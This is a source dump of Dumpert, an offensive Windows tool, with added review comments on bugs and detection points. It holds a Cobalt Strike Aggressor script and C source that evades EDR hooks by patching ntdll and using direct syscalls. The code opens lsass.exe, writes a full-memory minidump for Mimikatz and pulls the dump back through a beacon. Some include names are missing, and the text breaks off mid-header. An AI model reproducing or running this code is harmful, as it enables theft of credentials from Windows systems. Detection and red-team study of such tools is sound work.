├── Dumpert-Aggressor └── Outflank-Dumpert.cna ├── Dumpert-DLL ├── Outflank-Dumpert-DLL.sln └── Outflank-Dumpert-DLL │ ├── Dumpert.c │ ├── Dumpert.h │ ├── Outflank-Dumpert-DLL.vcxproj │ ├── Outflank-Dumpert-DLL.vcxproj.filters │ ├── Outflank-Dumpert-DLL.vcxproj.user │ └── Syscalls.asm ├── Dumpert ├── Outflank-Dumpert.sln └── Outflank-Dumpert │ ├── Dumpert.c │ ├── Dumpert.h │ ├── Outflank-Dumpert.vcxproj │ ├── Outflank-Dumpert.vcxproj.filters │ ├── Outflank-Dumpert.vcxproj.user │ └── Syscalls.asm └── README.md /Dumpert-Aggressor/Outflank-Dumpert.cna: -------------------------------------------------------------------------------- 1 | #author Cornelis de Plaa 2 | #@outflank.nl 3 | 4 | #injects a sRDI shellcode (shellcode Reflective DLL Injection) in current process and creates a minidump of lsass process. 5 | #see https://github.com/monoxgas/sRDI 6 | 7 | #register help 8 | beacon_command_register("dumpert", "Create a minidump of lsass process", 9 | "Synopsis: dumpert\n\n" . 10 | "Creates a minidump of lsass process using sRDI shellcode injection and downloads minidump file.\n" . 
11 | "Lsass minidump can be imported in Mimikatz using: \"sekurlsa::minidump dumpert.dmp\""); 12 | 13 | alias dumpert { 14 | $bid = $1; 15 | $curr_pid = beacon_info($bid, "pid"); 16 | 17 | if (-isadmin $bid) { 18 | blog($bid, "Dumpert by Outflank"); 19 | if (-is64 $bid) { 20 | bshinject($bid, $curr_pid, "x64", script_resource("Outflank-Dumpert.bin")); 21 | blog($bid, "Waiting a few seconds for task to complete..."); 22 | bpause($bid, 10000); 23 | bdownload($bid, "C:\\Windows\\Temp\\dumpert.dmp"); 24 | return; 25 | } 26 | else{ 27 | berror($bid, "Dumpert is x64 only."); 28 | return; 29 | } 30 | } 31 | else{ 32 | berror($bid, "You need elevated privileges."); 33 | return; 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /Dumpert-DLL/Outflank-Dumpert-DLL.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Express 14 for Windows Desktop 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Outflank-Dumpert-DLL", "Outflank-Dumpert-DLL\Outflank-Dumpert-DLL.vcxproj", "{307088B9-2992-4DE7-A57D-9E657B1CE546}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x64.ActiveCfg = Debug|x64 17 | {307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x64.Build.0 = Debug|x64 18 | {307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x86.ActiveCfg = Debug|Win32 19 | {307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x86.Build.0 = Debug|Win32 20 | {307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x64.ActiveCfg = Release|x64 21 | 
{307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x64.Build.0 = Release|x64
22 | {307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x86.ActiveCfg = Release|Win32
23 | {307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | EndGlobal
29 |
--------------------------------------------------------------------------------
/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c:
--------------------------------------------------------------------------------
/*
 * Dumpert.c (DLL build) - writes a MiniDumpWithFullMemory minidump of
 * lsass.exe to <Windows directory>\Temp\dumpert.dmp.
 *
 * Review notes (what this file observably does):
 *  - Process enumeration, the handle to lsass, the ntdll patch and the
 *    dump-file creation go through the per-OS-version syscall stubs
 *    declared in Dumpert.h (implemented in Syscalls.asm) rather than the
 *    ntdll exports.  User-mode hooks on those exports therefore do not see
 *    these calls; kernel-side telemetry (object-access callbacks such as
 *    Sysmon ProcessAccess events) still does.
 *  - Unhook_NativeAPI() overwrites the first 5 bytes of
 *    ntdll!NtReadVirtualMemory in this process (see below).
 *  - MiniDumpWriteDump() (Dbghelp.lib) is called through the normal import
 *    and the dump goes to a fixed, predictable path.
 *  - Only Windows 7 SP1 (build 7601), 8 (6.2), 8.1 (6.3) and 10 (10.0) are
 *    handled; any other version makes Dump() call exit(1).
 */
#undef _UNICODE
#define _UNICODE
#undef UNICODE
#define UNICODE

// NOTE(review): the system header names were lost in this rendering.
// Dbghelp.lib below and MiniDumpWriteDump() imply <DbgHelp.h>; confirm the
// others against the repository.
#include
#include
#include "Dumpert.h"
#include

#pragma comment (lib, "Dbghelp.lib")


/*
 * Unhook_NativeAPI - overwrite the start of the ntdll export named by
 * pWinVerInfo->lpApiCall in the current process.
 *
 * AssemblyBytes is 4C 8B D1 B8 xx, i.e. "mov r10, rcx; mov eax, <imm32>"
 * with only the low byte of the immediate (pWinVerInfo->SystemCall)
 * supplied: the same opening instructions the stubs in Syscalls.asm use.
 * The protection change and the write are done with the OS-specific
 * ZwProtectVirtualMemory / ZwWriteVirtualMemory stubs selected here.
 *
 * Returns TRUE when both protection changes and the write report
 * STATUS_SUCCESS; FALSE for an unsupported OS version or any failed call.
 *
 * Review notes:
 *  - lpProcAddress is not checked for NULL before it is used.
 *  - uSize (10) exceeds sizeof(AssemblyBytes) (5); only 5 bytes are
 *    written, whatever follows them is left as found.
 *  - If ZwWriteVirtualMemory fails the function returns without restoring
 *    OldProtection, leaving the range PAGE_EXECUTE_READWRITE.
 *  - Detection: the in-memory .text of ntdll no longer matches the on-disk
 *    image after this runs; a user-mode write to ntdll code from a
 *    non-loader component is the observable event.
 */
BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
    BYTE AssemblyBytes[] = {0x4C, 0x8B, 0xD1, 0xB8, 0xFF};

    // Pick the syscall stubs for this OS version; the patch byte is the
    // per-version syscall number Dump() stored in SystemCall.
    if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
        AssemblyBytes[4] = pWinVerInfo->SystemCall;
        ZwWriteVirtualMemory = &ZwWriteVirtualMemory10;
        ZwProtectVirtualMemory = &ZwProtectVirtualMemory10;
    }
    else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) {
        AssemblyBytes[4] = pWinVerInfo->SystemCall;
        ZwWriteVirtualMemory = &ZwWriteVirtualMemory7SP1;
        ZwProtectVirtualMemory = &ZwProtectVirtualMemory7SP1;
    }
    else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
        AssemblyBytes[4] = pWinVerInfo->SystemCall;
        ZwWriteVirtualMemory = &ZwWriteVirtualMemory80;
        ZwProtectVirtualMemory = &ZwProtectVirtualMemory80;
    }
    else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
        AssemblyBytes[4] = pWinVerInfo->SystemCall;
        ZwWriteVirtualMemory = &ZwWriteVirtualMemory81;
        ZwProtectVirtualMemory = &ZwProtectVirtualMemory81;
    }
    else {
        return FALSE;
    }

    // Address of the export to patch (unchecked: NULL on failure).
    LPVOID lpProcAddress = GetProcAddress(LoadLibrary(L"ntdll.dll"), pWinVerInfo->lpApiCall);

    LPVOID lpBaseAddress = lpProcAddress;
    ULONG OldProtection, NewProtection;
    SIZE_T uSize = 10;  // larger than the 5-byte write below
    NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
    if (status != STATUS_SUCCESS) {
        return FALSE;
    }

    status = ZwWriteVirtualMemory(GetCurrentProcess(), lpProcAddress, (PVOID)AssemblyBytes, sizeof(AssemblyBytes), NULL);
    if (status != STATUS_SUCCESS) {
        return FALSE;  // returns with the range still RWX
    }

    status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection);
    if (status != STATUS_SUCCESS) {
        return FALSE;
    }

    return TRUE;
}

/*
 * GetPID - find the PID of the process whose image name equals
 * pWinVerInfo->ProcName (case-insensitive) using SystemProcessInformation.
 *
 * Selects the OS-specific ZwQuerySystemInformation / NtAllocateVirtualMemory
 * / NtFreeVirtualMemory stubs, probes the required buffer size, allocates
 * and fills the buffer in this process, and walks the SYSTEM_PROCESSES list
 * via NextEntryDelta.  On a match pWinVerInfo->hTargetPID receives the
 * ProcessId; it stays NULL otherwise.
 *
 * Returns TRUE when a match was found; FALSE for an unsupported OS version,
 * a failed allocation or query, a missing RtlEqualUnicodeString export, or
 * no match.
 *
 * Review notes:
 *  - `!status == 0xc0000004` parses as `(!status) == 0xc0000004`, which is
 *    never true, so the size-probe status is effectively unchecked.
 *  - The walk stops only on a match.  On the last entry NextEntryDelta is 0,
 *    so pProcInfo stops advancing but never becomes NULL; the loop does not
 *    terminate when ProcName is absent.
 *  - pBuffer is not freed on the early-return paths after allocation, and
 *    the NtFreeVirtualMemory status is ignored.
 *  - RtlEqualUnicodeString is resolved with GetProcAddress, a normal
 *    import-style lookup unlike the syscall stubs.
 */
BOOL GetPID(IN PWIN_VER_INFO pWinVerInfo) {
    pWinVerInfo->hTargetPID = NULL;

    if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
        ZwQuerySystemInformation = &ZwQuerySystemInformation10;
        NtAllocateVirtualMemory = &NtAllocateVirtualMemory10;
        NtFreeVirtualMemory = &NtFreeVirtualMemory10;
    }
    else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) {
        ZwQuerySystemInformation = &ZwQuerySystemInformation7SP1;
        NtAllocateVirtualMemory = &NtAllocateVirtualMemory7SP1;
        NtFreeVirtualMemory = &NtFreeVirtualMemory7SP1;
    }
    else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
        ZwQuerySystemInformation = &ZwQuerySystemInformation80;
        NtAllocateVirtualMemory = &NtAllocateVirtualMemory80;
        NtFreeVirtualMemory = &NtFreeVirtualMemory80;
    }
    else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
        ZwQuerySystemInformation = &ZwQuerySystemInformation81;
        NtAllocateVirtualMemory = &NtAllocateVirtualMemory81;
        NtFreeVirtualMemory = &NtFreeVirtualMemory81;
    }
    else {
        return FALSE;
    }

    // Size probe: a zero-length query is expected to fail with
    // 0xc0000004 (STATUS_INFO_LENGTH_MISMATCH) and report the needed size.
    ULONG uReturnLength = 0;
    NTSTATUS status = ZwQuerySystemInformation(SystemProcessInformation, 0, 0, &uReturnLength);
    if (!status == 0xc0000004) {  // precedence: (!status) == 0xc0000004, never true
        return FALSE;
    }

    LPVOID pBuffer = NULL;
    SIZE_T uSize = uReturnLength;
    status = NtAllocateVirtualMemory(GetCurrentProcess(), &pBuffer, 0, &uSize, MEM_COMMIT, PAGE_READWRITE);
    if (status != 0) {
        return FALSE;
    }

    status = ZwQuerySystemInformation(SystemProcessInformation, pBuffer, uReturnLength, &uReturnLength);
    if (status != 0) {
        return FALSE;  // pBuffer leaked
    }

    _RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)
        GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlEqualUnicodeString");
    if (RtlEqualUnicodeString == NULL) {
        return FALSE;  // pBuffer leaked
    }

    PSYSTEM_PROCESSES pProcInfo = (PSYSTEM_PROCESSES)pBuffer;
    do {
        if (RtlEqualUnicodeString(&pProcInfo->ProcessName, &pWinVerInfo->ProcName, TRUE)) {
            pWinVerInfo->hTargetPID = pProcInfo->ProcessId;
            break;
        }
        // NextEntryDelta == 0 on the last entry: pProcInfo stays put, so the
        // while condition below never becomes false on its own.
        pProcInfo = (PSYSTEM_PROCESSES)(((LPBYTE)pProcInfo) + pProcInfo->NextEntryDelta);

    } while (pProcInfo);

    status = NtFreeVirtualMemory(GetCurrentProcess(), &pBuffer, &uSize, MEM_RELEASE);

    if (pWinVerInfo->hTargetPID == NULL) {
        return FALSE;
    }

    return TRUE;
}

/*
 * IsElevated - TRUE when the current process token reports TokenIsElevated.
 * Opens the token with TOKEN_QUERY; any failure yields FALSE.  The token
 * handle is closed on every path.
 */
BOOL IsElevated() {
    BOOL fRet = FALSE;
    HANDLE hToken = NULL;
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
        TOKEN_ELEVATION Elevation = { 0 };
        DWORD cbSize = sizeof(TOKEN_ELEVATION);
        if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
            fRet = Elevation.TokenIsElevated;
        }
    }
    if (hToken) {
        CloseHandle(hToken);
    }
    return fRet;
}

/*
 * SetDebugPrivilege - try to enable SeDebugPrivilege on the current
 * process token.
 *
 * Returns FALSE if the token cannot be opened, the privilege LUID cannot be
 * looked up, or AdjustTokenPrivileges fails; TRUE otherwise.
 *
 * Review notes:
 *  - `TRUE ? SE_PRIVILEGE_ENABLED : 0` always evaluates to
 *    SE_PRIVILEGE_ENABLED; the ternary is a no-op.
 *  - A nonzero AdjustTokenPrivileges result does not mean the privilege was
 *    assigned (ERROR_NOT_ALL_ASSIGNED is only reported via GetLastError),
 *    and Dump() ignores this function's return value anyway.
 */
BOOL SetDebugPrivilege() {
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES TokenPrivileges = { 0 };

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
        return FALSE;
    }

    TokenPrivileges.PrivilegeCount = 1;
    TokenPrivileges.Privileges[0].Attributes = TRUE ? SE_PRIVILEGE_ENABLED : 0;  // always SE_PRIVILEGE_ENABLED

    LPWSTR lpwPriv = L"SeDebugPrivilege";
    if (!LookupPrivilegeValueW(NULL, (LPCWSTR)lpwPriv, &TokenPrivileges.Privileges[0].Luid)) {
        CloseHandle(hToken);
        return FALSE;
    }

    if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
        CloseHandle(hToken);
        return FALSE;
    }

    CloseHandle(hToken);
    return TRUE;
}

/*
 * Dump - exported entry point: write a full-memory minidump of lsass.exe to
 * <Windows directory>\Temp\dumpert.dmp.
 *
 * Steps:
 *  1. Require a 64-bit build and an elevated token; enable SeDebugPrivilege
 *     (result ignored).
 *  2. Read the OS version with ntdll!RtlGetVersion, format "major.minor"
 *     into chOSMajorMinor and choose the ZwOpenProcess / ZwClose /
 *     NtCreateFile stubs plus the syscall number that Unhook_NativeAPI()
 *     will write into NtReadVirtualMemory.
 *  3. Resolve lsass.exe's PID (GetPID) and patch NtReadVirtualMemory
 *     (Unhook_NativeAPI) — presumably because MiniDumpWriteDump reads the
 *     target through ReadProcessMemory -> NtReadVirtualMemory; not verified
 *     here.
 *  4. Open lsass with PROCESS_ALL_ACCESS, create the dump file with
 *     NtCreateFile (FILE_OVERWRITE_IF, synchronous), call MiniDumpWriteDump
 *     with MiniDumpWithFullMemory, close both handles.
 *
 * Review notes:
 *  - Every failure path calls exit(1).  DllMain() invokes Dump() on
 *    DLL_PROCESS_ATTACH, so a failure terminates the host process.
 *  - calloc() is unchecked and pWinVerInfo is never freed.
 *  - The ZwOpenProcess status is ignored; only hProcess == NULL is tested.
 *  - hDmpFile is compared with INVALID_HANDLE_VALUE, but it starts as NULL
 *    and NtCreateFile does not set it on failure, so a failed create falls
 *    through to MiniDumpWriteDump with a NULL file handle.
 *  - The MiniDumpWriteDump result (Success) is never checked.
 *  - Detection: a handle to lsass.exe opened with PROCESS_ALL_ACCESS
 *    (visible to kernel object callbacks / Sysmon ProcessAccess even though
 *    the call bypasses ntdll), Dbghelp loaded into a process that then
 *    writes a file with the MDMP signature, and dumpert.dmp appearing under
 *    <Windows directory>\Temp (the path the Aggressor script downloads).
 */
__declspec(dllexport) void __cdecl Dump() {

    // x64 only (the Aggressor script makes the same check on its side).
    if (sizeof(LPVOID) != 8) {
        exit(1);
    }

    if (!IsElevated()) {
        exit(1);
    }

    SetDebugPrivilege();  // return value ignored

    PWIN_VER_INFO pWinVerInfo = (PWIN_VER_INFO)calloc(1, sizeof(WIN_VER_INFO));  // unchecked, never freed

    // First set OS Version/Architecture specific values
    OSVERSIONINFOEXW osInfo;
    osInfo.dwOSVersionInfoSize = sizeof(osInfo);  // only field set before RtlGetVersion fills the rest

    _RtlGetVersion RtlGetVersion = (_RtlGetVersion)
        GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion");
    if (RtlGetVersion == NULL) {
        exit(1);
    }

    RtlGetVersion(&osInfo);
    swprintf_s(pWinVerInfo->chOSMajorMinor, _countof(pWinVerInfo->chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion);
    pWinVerInfo->dwBuildNumber = osInfo.dwBuildNumber;

    // Now create os/build specific syscall function pointers.
    // SystemCall is the per-version number for lpApiCall (NtReadVirtualMemory,
    // set below) that Unhook_NativeAPI() patches into the export.
    if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
        ZwOpenProcess = &ZwOpenProcess10;
        ZwClose = &ZwClose10;
        NtCreateFile = &NtCreateFile10;
        pWinVerInfo->SystemCall = 0x3F;
    }
    else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && osInfo.dwBuildNumber == 7601) {
        ZwOpenProcess = &ZwOpenProcess7SP1;
        ZwClose = &ZwClose7SP1;
        NtCreateFile = &NtCreateFile7SP1;
        pWinVerInfo->SystemCall = 0x3C;
    }
    else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
        ZwOpenProcess = &ZwOpenProcess80;
        ZwClose = &ZwClose80;
        NtCreateFile = &NtCreateFile80;
        pWinVerInfo->SystemCall = 0x3D;
    }
    else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
        ZwOpenProcess = &ZwOpenProcess81;
        ZwClose = &ZwClose81;
        NtCreateFile = &NtCreateFile81;
        pWinVerInfo->SystemCall = 0x3E;
    }
    else {
        exit(1);  // unsupported OS version
    }

    _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
        GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString");
    if (RtlInitUnicodeString == NULL) {
        exit(1);
    }

    // Target image name; matched case-insensitively in GetPID().
    RtlInitUnicodeString(&pWinVerInfo->ProcName, L"lsass.exe");

    if (!GetPID(pWinVerInfo)) {
        exit(1);
    }

    pWinVerInfo->lpApiCall = "NtReadVirtualMemory";

    if (!Unhook_NativeAPI(pWinVerInfo)) {
        exit(1);
    }

    HANDLE hProcess = NULL;
    OBJECT_ATTRIBUTES ObjectAttributes;
    InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
    CLIENT_ID uPid = { 0 };

    uPid.UniqueProcess = pWinVerInfo->hTargetPID;
    uPid.UniqueThread = (HANDLE)0;

    // Full-access handle to lsass via the direct-syscall stub; status unused.
    NTSTATUS status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &uPid);
    if (hProcess == NULL) {
        exit(1);
    }

    // NT-style path: \??\<Windows directory>\Temp\dumpert.dmp
    WCHAR chDmpFile[MAX_PATH] = L"\\??\\";
    WCHAR chWinPath[MAX_PATH];
    GetWindowsDirectory(chWinPath, MAX_PATH);  // return value unchecked
    wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), chWinPath);
    wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), L"\\Temp\\dumpert.dmp");

    UNICODE_STRING uFileName;
    RtlInitUnicodeString(&uFileName, chDmpFile);

    HANDLE hDmpFile = NULL;
    IO_STATUS_BLOCK IoStatusBlock;
    ZeroMemory(&IoStatusBlock, sizeof(IoStatusBlock));
    OBJECT_ATTRIBUTES FileObjectAttributes;
    InitializeObjectAttributes(&FileObjectAttributes, &uFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);

    // Open input file for writing, overwrite existing file.
    // Argument order: AllocationSize=0, FileAttributes, ShareAccess,
    // CreateDisposition, CreateOptions, EaBuffer, EaLength.
    status = NtCreateFile(&hDmpFile, FILE_GENERIC_WRITE, &FileObjectAttributes, &IoStatusBlock, 0,
        FILE_ATTRIBUTE_NORMAL, FILE_SHARE_WRITE, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);

    // hDmpFile is NULL (not INVALID_HANDLE_VALUE) when the create fails, so
    // this guard does not catch that case; status is not consulted either.
    if (hDmpFile == INVALID_HANDLE_VALUE) {
        ZwClose(hProcess);
        exit(1);
    }

    DWORD dwTargetPID = GetProcessId(hProcess);
    // Full-memory minidump of lsass through Dbghelp (normal import path).
    BOOL Success = MiniDumpWriteDump(hProcess,
        dwTargetPID,
        hDmpFile,
        MiniDumpWithFullMemory,
        NULL,
        NULL,
        NULL);  // Success is never checked

    ZwClose(hDmpFile);
    ZwClose(hProcess);

    return;
}

/*
 * DllMain - runs Dump() as soon as the DLL is loaded (DLL_PROCESS_ATTACH),
 * i.e. under the loader lock, where LoadLibrary(), Dbghelp and exit() are
 * all invoked.  The other reasons are no-ops.  The project's .vcxproj.user
 * debug settings also invoke the export directly through rundll32 ",Dump".
 * Always returns TRUE.
 */
BOOL APIENTRY DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved)
{

    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        Dump();  // all of the work happens here, at load time
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
--------------------------------------------------------------------------------
/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #include
4 |
5 | #define STATUS_SUCCESS 0
6 | #define OBJ_CASE_INSENSITIVE 0x00000040L
7 | #define FILE_OVERWRITE_IF 0x00000005
8 | #define FILE_SYNCHRONOUS_IO_NONALERT
0x00000020 9 | typedef LONG KPRIORITY; 10 | 11 | #define InitializeObjectAttributes( i, o, a, r, s ) { \ 12 | (i)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 13 | (i)->RootDirectory = r; \ 14 | (i)->Attributes = a; \ 15 | (i)->ObjectName = o; \ 16 | (i)->SecurityDescriptor = s; \ 17 | (i)->SecurityQualityOfService = NULL; \ 18 | } 19 | 20 | typedef struct _UNICODE_STRING { 21 | USHORT Length; 22 | USHORT MaximumLength; 23 | PWSTR Buffer; 24 | } UNICODE_STRING, *PUNICODE_STRING; 25 | 26 | typedef const UNICODE_STRING* PCUNICODE_STRING; 27 | 28 | typedef struct _WIN_VER_INFO { 29 | WCHAR chOSMajorMinor[8]; 30 | DWORD dwBuildNumber; 31 | UNICODE_STRING ProcName; 32 | HANDLE hTargetPID; 33 | LPCSTR lpApiCall; 34 | INT SystemCall; 35 | } WIN_VER_INFO, *PWIN_VER_INFO; 36 | 37 | typedef struct _OBJECT_ATTRIBUTES { 38 | ULONG Length; 39 | HANDLE RootDirectory; 40 | PUNICODE_STRING ObjectName; 41 | ULONG Attributes; 42 | PVOID SecurityDescriptor; 43 | PVOID SecurityQualityOfService; 44 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 45 | 46 | typedef struct _CLIENT_ID { 47 | HANDLE UniqueProcess; 48 | HANDLE UniqueThread; 49 | } CLIENT_ID, *PCLIENT_ID; 50 | 51 | typedef enum _SYSTEM_INFORMATION_CLASS { 52 | SystemBasicInformation, 53 | SystemProcessorInformation, 54 | SystemPerformanceInformation, 55 | SystemTimeOfDayInformation, 56 | SystemPathInformation, 57 | SystemProcessInformation, 58 | SystemCallCountInformation, 59 | SystemDeviceInformation, 60 | SystemProcessorPerformanceInformation, 61 | SystemFlagsInformation, 62 | SystemCallTimeInformation, 63 | SystemModuleInformation 64 | } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; 65 | 66 | typedef struct _SYSTEM_PROCESSES { 67 | ULONG NextEntryDelta; 68 | ULONG ThreadCount; 69 | ULONG Reserved1[6]; 70 | LARGE_INTEGER CreateTime; 71 | LARGE_INTEGER UserTime; 72 | LARGE_INTEGER KernelTime; 73 | UNICODE_STRING ProcessName; 74 | KPRIORITY BasePriority; 75 | HANDLE ProcessId; 76 | HANDLE InheritedFromProcessId; 77 | } 
SYSTEM_PROCESSES, *PSYSTEM_PROCESSES; 78 | 79 | typedef struct _IO_STATUS_BLOCK 80 | { 81 | union 82 | { 83 | LONG Status; 84 | PVOID Pointer; 85 | }; 86 | ULONG Information; 87 | } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; 88 | 89 | 90 | // Windows 7 SP1 / Server 2008 R2 specific Syscalls 91 | EXTERN_C NTSTATUS NtAllocateVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); 92 | EXTERN_C NTSTATUS NtFreeVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); 93 | EXTERN_C NTSTATUS ZwOpenProcess7SP1(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 94 | EXTERN_C NTSTATUS ZwClose7SP1(IN HANDLE KeyHandle); 95 | EXTERN_C NTSTATUS ZwWriteVirtualMemory7SP1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); 96 | EXTERN_C NTSTATUS ZwProtectVirtualMemory7SP1(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); 97 | EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation7SP1(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 98 | EXTERN_C NTSTATUS NtCreateFile7SP1(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 99 | 100 | // Windows 8 / Server 2012 specific Syscalls 101 | EXTERN_C NTSTATUS NtAllocateVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); 102 | EXTERN_C NTSTATUS NtFreeVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG 
FreeType); 103 | EXTERN_C NTSTATUS ZwOpenProcess80(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 104 | EXTERN_C NTSTATUS ZwClose80(IN HANDLE KeyHandle); 105 | EXTERN_C NTSTATUS ZwWriteVirtualMemory80(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); 106 | EXTERN_C NTSTATUS ZwProtectVirtualMemory80(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); 107 | EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation80(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 108 | EXTERN_C NTSTATUS NtCreateFile80(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 109 | 110 | 111 | // Windows 8.1 / Server 2012 R2 specific Syscalls 112 | EXTERN_C NTSTATUS NtAllocateVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); 113 | EXTERN_C NTSTATUS NtFreeVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); 114 | EXTERN_C NTSTATUS ZwOpenProcess81(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); 115 | EXTERN_C NTSTATUS ZwClose81(IN HANDLE KeyHandle); 116 | EXTERN_C NTSTATUS ZwWriteVirtualMemory81(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); 117 | EXTERN_C 